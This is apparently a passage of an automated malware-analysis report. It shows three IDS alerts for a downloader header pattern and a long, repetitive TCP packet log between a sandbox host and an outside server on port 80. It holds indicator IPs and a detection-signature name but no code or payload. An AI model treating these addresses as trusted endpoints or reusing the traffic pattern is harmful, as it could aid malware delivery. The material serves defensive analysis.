                                                                                                          2024-10-30T08:19:56.949439+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.22 | 49170 | 188.114.97.3 | 443 | TCP
                                                                                                          2024-10-30T08:19:58.455619+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.22 | 49172 | 188.114.96.3 | 443 | TCP
                                                                                                          2024-10-30T08:20:15.045474+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.22 | 49179 | 188.114.96.3 | 443 | TCP
                                                                                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                          Oct 30, 2024 08:19:41.355238914 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.355253935 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.355384111 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.355418921 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.355431080 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.355463028 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.355472088 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.355506897 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.355519056 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.355557919 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.356095076 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.356123924 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.356148958 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.356159925 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.356235981 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.356290102 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.356290102 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.356324911 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.356334925 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.356378078 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.359281063 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.359330893 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.359333038 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.359371901 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.359571934 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.359606028 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.359622955 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.359642982 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.359647036 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.359672070 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.359699965 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.359725952 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.531009912 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.531033039 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.531044006 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.531058073 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.531069994 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.531081915 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.531089067 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.531099081 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.531111002 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.531184912 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.531272888 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.531282902 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.531296015 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.531321049 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.531368971 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.531379938 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.531394958 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.531413078 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.531426907 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.531522989 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.531583071 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.531583071 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.531594992 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.531605005 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.531616926 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.531630039 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.531667948 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.531677961 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.531703949 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.531886101 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.531917095 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.531932116 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.531936884 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.531949043 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.531964064 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.532078981 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.532121897 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.532176018 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.532186031 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.532212973 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.532227993 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.532238960 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.532274008 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.532537937 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.532548904 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.532560110 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.532582998 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.532588959 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.532596111 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.532607079 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.532618046 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.532627106 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.532639980 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.532655001 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.532893896 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.532932997 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.532946110 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.532957077 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.532980919 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.533024073 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.533034086 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.533068895 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.533325911 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.533335924 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.533349037 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.533368111 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.533373117 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.533380032 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.533405066 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.533759117 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.533798933 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.533807993 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.533819914 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.533849955 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.533910990 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.533921957 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.533931971 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.533942938 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.533977985 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.534012079 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.534022093 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.534030914 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.534061909 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.707659960 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.707686901 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.707700968 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.707714081 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.707726955 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.707729101 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.707729101 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.707758904 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.707772970 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.707791090 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.707825899 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.707838058 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.707853079 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.707865000 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.707874060 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.707880020 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.707900047 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.707926989 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.707938910 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.707974911 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.708009958 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.708020926 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.708044052 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.708050013 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.708085060 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.708121061 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.708131075 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.708132982 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.708144903 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.708154917 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.708164930 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.708184958 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.708267927 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.708309889 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.708317041 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.708327055 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.708354950 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.708385944 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.708427906 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.708441019 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.708452940 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.708483934 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.708515882 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.708555937 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.708575010 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.708589077 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.887721062 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.887723923 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.887732029 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.887748957 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.887772083 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.887782097 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.887799025 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.887811899 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.887845039 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.887855053 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.887866020 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.887880087 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.887895107 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.887911081 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.887922049 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.887934923 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.887949944 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.887964964 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.887969971 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.887980938 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.887991905 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.887998104 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888010979 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888025999 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888075113 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888086081 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888101101 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888118982 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888129950 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888226986 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888238907 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888251066 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888267994 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888277054 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888277054 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888288021 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888303995 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888318062 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888336897 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888348103 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888365030 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888377905 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888384104 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888394117 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888417959 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888444901 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888453960 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888483047 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888510942 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888520956 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888531923 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888544083 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888546944 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888555050 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888566971 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888576031 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888592958 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888603926 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888633966 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888638973 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888643026 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888659954 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888674974 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888699055 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888730049 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888742924 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888755083 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888766050 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888781071 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888792992 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888830900 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888842106 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888854980 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888870001 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888885975 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888922930 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888932943 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.888958931 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.888989925 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889000893 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889018059 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889029026 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889034986 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889039993 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.889053106 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.889065027 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.889107943 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889144897 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.889179945 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889190912 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889219046 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.889272928 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889285088 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889296055 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889316082 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.889331102 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.889353991 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889364004 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889374971 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889391899 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.889393091 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889405012 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889406919 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.889415026 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889424086 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.889427900 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889434099 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.889452934 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.889463902 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889476061 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889492035 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.889507055 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.889657021 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889667988 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889678001 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889695883 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.889708042 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.889744997 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889755964 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889780045 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889781952 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.889791012 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889802933 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889808893 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.889821053 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.889837027 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.889861107 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889873028 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889883995 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889909983 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.889931917 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889950991 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.889961004 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.889964104 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.889970064 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.890002012 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.890007019 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.890017986 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.890029907 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.890038013 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.890041113 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.890057087 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.890074015 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.890099049 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.890109062 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.890130997 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.890135050 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.890146017 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.890175104 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.890211105 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.890222073 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.890232086 CET804916187.120.84.38192.168.2.22
                                                                                                          Oct 30, 2024 08:19:41.890249014 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.890263081 CET4916180192.168.2.2287.120.84.38
                                                                                                          Oct 30, 2024 08:19:41.890292883 CET804916187.120.84.38192.168.2.22
